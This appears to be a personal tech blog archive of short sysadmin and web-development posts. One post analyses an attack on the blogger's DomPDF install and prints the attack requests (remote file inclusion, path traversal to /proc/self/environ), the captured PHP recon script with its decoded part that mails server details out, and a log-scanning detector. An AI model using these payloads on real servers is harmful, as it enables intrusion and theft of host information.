Archive for the ‘English’ Category

Concrete 5 SQL errors during installation

Friday, February 3rd, 2012

We have seen this error with Concrete 5.5.1

You try to set up Concrete 5 and get strange SQL errors during the installation:

If installing with an empty site, like this

[Screenshot: c5-nosample-content-chosen]

you get:

[Screenshot: c5-mysql-error]

mysql error: [1048: Column 'uID' cannot be null] in EXECUTE("INSERT INTO Config (cfKey,cfValue,uID) VALUES ('NEWSFLOW_LAST_VIEWED','FIRSTRUN',NULL)")

If installing with Sample content with Blog:

[Screenshot: c5 with sample content]

The error you get is:

Catchable fatal error: Argument 1 passed to ContentImporter::importPageAreas() must be an instance of Page, boolean given, called in /concrete/libraries/content/importer.php on line 75 and defined in /concrete/libraries/content/importer.php on line 197.

 

Solution:

You don't run Varnish by any chance, do you? We do, and we had it set up to … dispose of some cookies. The solution is, in Varnish's case, to enable pass-through for the host you are installing on.

You want to enable cookies.

 

Explanation:

The code which breaks is located in concrete5.5.1\concrete\models\package\starting_point.php

Config::save('SITE', SITE);
Config::save('SITE_APP_VERSION', APP_VERSION);
$u = new User();
$u->saveConfig('NEWSFLOW_LAST_VIEWED', 'FIRSTRUN');

As you see, this is the first time a User is created and used.

The User class is defined in concrete5.5.1\concrete\models\user.php

    if (isset($_SESSION['uID'])) {
        $this->uID = $_SESSION['uID'];
        $this->uName = $_SESSION['uName'];
        $this->uTimezone = $_SESSION['uTimezone'];
        if (isset($_SESSION['uDefaultLanguage'])) {
            $this->uDefaultLanguage = $_SESSION['uDefaultLanguage'];
        }
        $this->superUser = ($_SESSION['uID'] == USER_SUPER_ID) ? true : false;
    } else {
        $this->uID = null;
        $this->uName = null;
        $this->superUser = false;
        $this->uDefaultLanguage = null;
        $this->uTimezone = null;
    }
    $this->uGroups = $this->_getUserGroups();
    if (!isset($args[2])) {
        $_SESSION['uGroups'] = $this->uGroups;
    }
}

The constructor checks the session for a valid user ID. If no user ID is found, uID is set to null, which is the NULL that the failing INSERT into Config then tries to store. This happens if you throw away the cookies, because the session ID is stored in them.

HTH. Feel free to comment on similar errors and solutions.

Good timer software

Wednesday, February 1st, 2012

An easy to use Freeware Timer:

http://www.sonoragraphics.com/timer.html#downloads

Finestra

Wednesday, January 4th, 2012

Running Windows 7? For a working Finestra (with correct Z-Order) use Version 1.1.

Version 1.2 messes up the Z-Order, and Version 2.0 and Version 2.1 both crash when hitting Win + Z to display the window overview (known bug). Sometimes the newest version is not the best one :-)

About Finestra

Finestra is a Virtual Desktop Manager for Windows. Freeware, fast switching, graphical indication to which desktop it switches.

Ability to drag windows to other desktops (using Win + Z to show the preview). Also useful for recovering windows which have been moved to outside your monitor by accident (believe me, it happens. Especially when using different monitor setups on notebooks)

Business!

Tuesday, January 3rd, 2012

How to get started in business?

Get obsessed about an idea, talk with everybody about it … then register a domain name and start setting up! WordPress is a great solution, easily installed, and there you are – you're a business with its own website!

What about the next steps?

Obviously, you don't want to stop talking about your new idea! Post it to FaceBook, set up camp in Twitter, start referring to it until people actually start to get annoyed :-)

To organize your ideas you might want to use XMind! (Yeah, there's a superb free version available, too!)

Don't forget to read all you can about business, and oh – do backup your files regularly!

If your page actually starts getting massive hits, we recommend working together with us (!) and MaxCDN for all your content delivery needs.

The most important thing

Is just to get going, to love the idea and business creativity. To do it for a purpose, to change the world! Get excited, and people will follow you. Read Napoleon Hill's book – Think and get rich – to understand what I mean.

Want help?

Head on over to CatFind.it and get your answers. (See what I mean?)

Great looking Websites

Wednesday, December 28th, 2011

University of Iowa Healthcare

  • Clean looking
  • informative
  • entertaining / attention-grasping

Installing Zenoss Core on OpenVZ and Ubuntu-VEs

Monday, December 26th, 2011

What is Zenoss Core?

Zenoss Core is a fabulous, Open Source network and device monitor. It allows you to collect statistics, track uptime and get alerts for a wide array of devices and applications, e.g. printers, routers, Linux and Windows servers, Varnish cache and many more.

It is important to see the performance of your digital assets, to ensure optimum experience for the users, and be able to react before someone notices the problems on the outside of your organisation.

Mission-critical components, e.g. corporate e-mail servers, can be monitored with this solution.

Setting up Zenoss Core on an Ubuntu-VPS under OpenVZ

Zenoss Core can be installed in an OpenVZ container. I chose to use the contributed Ubuntu 10.04 minimal template downloaded from OpenVZ.org. It will be a dedicated VE, just for Zenoss Core.

"ubuntu-10.04-minimal_10.04_amd64.tar.gz"

  • 10.04 is LTS (long term supported)
  • the minimal comes without Apache or other services

The installation of the Zenoss stack will fail if your resource limits (particularly memory) are set too low. Here's an excerpt from the configuration file of my VPS:

ONBOOT="yes"

# UBC parameters (in form of barrier:limit)
KMEMSIZE="14372700:14790164"
LOCKEDPAGES="256:256"
PRIVVMPAGES="1175000:1250000"
SHMPAGES="21504:21504"
NUMPROC="240:240"
PHYSPAGES="0:9223372036854775807"
VMGUARPAGES="33792:9223372036854775807"
OOMGUARPAGES="26112:9223372036854775807"
NUMTCPSOCK="360:360"
NUMFLOCK="188:206"
NUMPTY="16:16"
NUMSIGINFO="256:256"
TCPSNDBUF="1720320:2703360"
TCPRCVBUF="2703360:3003360"
OTHERSOCKBUF="1126080:2097152"
DGRAMRCVBUF="262144:262144"
NUMOTHERSOCK="360:360"
DCACHESIZE="3409920:3624960"
NUMFILE="9312:9312"
AVNUMPROC="180:180"
NUMIPTENT="128:128"

# Disk quota parameters (in form of softlimit:hardlimit)
DISKSPACE="5242880:5242880"
DISKINODES="200000:220000"
QUOTATIME="0"

# CPU fair sheduler parameter
CPUUNITS="1000"

You need to install wget and binutils.

apt-get install wget binutils

Then download the newest Zenoss Stack DEB package from Zenoss. The stack includes webserver, a dedicated MySQL instance and other things for running Zenoss. Choose from the native stacks (DEBIAN/UBUNTU), DEB based. In /tmp :

wget http://dev.zenoss.org/deb/dists/main/stable/binary-amd64/zenoss-stack_3.2.1_x64.deb

I used the x64 stack, as we have a 64bit server.

Install the stack using dpkg:

dpkg -i zenoss-stack_3.2.1_x64.deb

This will take quite some time! On finish, start Zenoss Core with

/etc/init.d/zenoss-stack start

Now you are finished with the console part. Fire up your browser, and go to the installation server's IP, port 8080, e.g. http://www.example.com:8080.

Here you will be asked to set up the admin password and a new user for "everyday usage". After creating them, you will be given the opportunity to automatically discover devices and servers, to manually set them up, or to skip to the dashboard. (You can, of course, always add devices and servers later on).

After getting to the dashboard, you can set up a Google Maps API Key. That is pretty self-explanatory, Zenoss Core will help you do it.

Good luck!

Further reading / watching:

Zenoss installation & monitoring a Linux server with SNMP

More information about this screencast on Castix – also includes the example snmpd.conf mentioned in the screencast.

Zenoss Core Getting Started – Adding Devices


Opera and Chrome blocking JSON requests in local mode

Friday, October 7th, 2011

If you browse a web page from your hard drive (that is, not hosted on a local Apache and called via localhost, but opened using file://), you might notice that your $.getJSON requests won't work, and your application will break.

This is by design, and a security measure.

If you only load static information via JSON (which you probably would in such an environment, right?), one (crutch of a) solution would be to include the information as a new .js file (include it in your HTML head) which sets up a variable containing this information. A simple assignment from this variable then replaces your $.getJSON call.

persist.js does not work with Firefox offline

Thursday, October 6th, 2011

Yes, it seems to be by design (of Firefox's implementation of localStorage). It does not work for file:// URLs.

Persist.js currently has no workaround, the contents of your database will be cleared …

In order for Firefox to work offline, you have to remove the "localstorage" type manually, like this:

Persist.remove('localstorage');

Persist.js will issue a warning that globalStorage can't be used, and fall back to cookie storage, which has size limitations. On a side note, removing both localstorage and cookie storage will fall back to Flash. Flash will probably work, but it pops up a message which your users might find bewildering, and click away – viz:

[Screenshot: persist]

What is left after removing localstorage, cookie and flash?

Nothing (as Gears is not available).

Cookie's the way to go – you will have to live with the size constraints!

The way to check for larger strings than the storage allows does not seem to work for me. I used:

Persist.size != -1 && Persist.size < JSON.stringify(tmp_answer_db).length

One workaround for larger data might be to use a JS compressor to fit everything into the cookie. Or save less – reduce to the essential! Don't use JSON, use your own notation. Even JSON is too large for the cookie.

Update: Detecting firefox in a local file:// environment and removing localstorage

// Detect Firefox. If it's the Fox AND running locally, remove localstorage
if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && window.location.protocol == 'file:') {
    Persist.remove('localstorage');
}

Attack on DomPDF

Sunday, October 2nd, 2011

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file; probably its danger lies in its use with the correct application. Here are the contents of vero.txt:

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("[base64 string not preserved]"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; }
$visitor = $_SERVER["REMOTE_ADDR"];
$float = "From : vurl info <full@info.com>";
$aran = exec('uname -a;');
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode;
mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

For the exploit to work, DomPDF has to actually execute the fetched file as PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com; going by the decoded code above, it reports the host and request URI that were hit, the requesting IP address, the output of uname -a and the safe mode setting.

Additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your php.ini.
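A log check for the two request patterns quoted above, as an added example that is not part of the original post: it flags dompdf.php requests whose input_file parameter carries a remote URL, path traversal, a null byte or /proc/self/environ. The function names are made up for this example, the third sample URI is constructed, and the traversal in the second one is shortened.

```python
import re
from urllib.parse import parse_qs, unquote

SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # any "scheme://" prefix

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so the checks see the final value."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_uri):
    """Return sorted reasons why a dompdf.php request looks hostile ([] if none)."""
    path, _, query = request_uri.partition("?")
    if not path.lower().endswith("dompdf.php"):
        return []
    reasons = set()
    for raw in parse_qs(query, keep_blank_values=True).get("input_file", []):
        value = decode_fully(raw)
        if SCHEME.match(value):
            reasons.add("remote-url")
        if "../" in value or "..\\" in value:
            reasons.add("path-traversal")
        if "\x00" in value:
            reasons.add("null-byte")
        if "/proc/self/environ" in value:
            reasons.add("proc-environ")
    return sorted(reasons)

def scan(uris):
    """Map each flagged request URI to its reasons."""
    found = ((uri, classify(uri)) for uri in uris)
    return {uri: reasons for uri, reasons in found if reasons}

# First two: the requests quoted in the post (traversal shortened).
# Third: constructed benign request for comparison.
SAMPLE_URIS = [
    "//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?",
    "/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php"
    "?input_file=../../../../proc/self/environ%00",
    "/invoices/dompdf.php?input_file=invoice-2011-10.html",
]

if __name__ == "__main__":
    for uri, reasons in scan(SAMPLE_URIS).items():
        print(", ".join(reasons), "<-", uri)
```

Feed it the request URIs from your Varnish or web server log; the path is split off by hand rather than with urlsplit because a leading "//" would otherwise be read as a host name.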

Interactive Brokers and Opera + Privoxy

Saturday, September 17th, 2011

At some point in creating a new account, Interactive Brokers' "Next" button won't work (on the page where you declare your investment targets and net worth).

The solution is to use FireFox without Privoxy to continue with the application form.

I am not sure whether it is Privoxy or Opera blocking the application (although I suspect Privoxy blocking some JavaScripts.)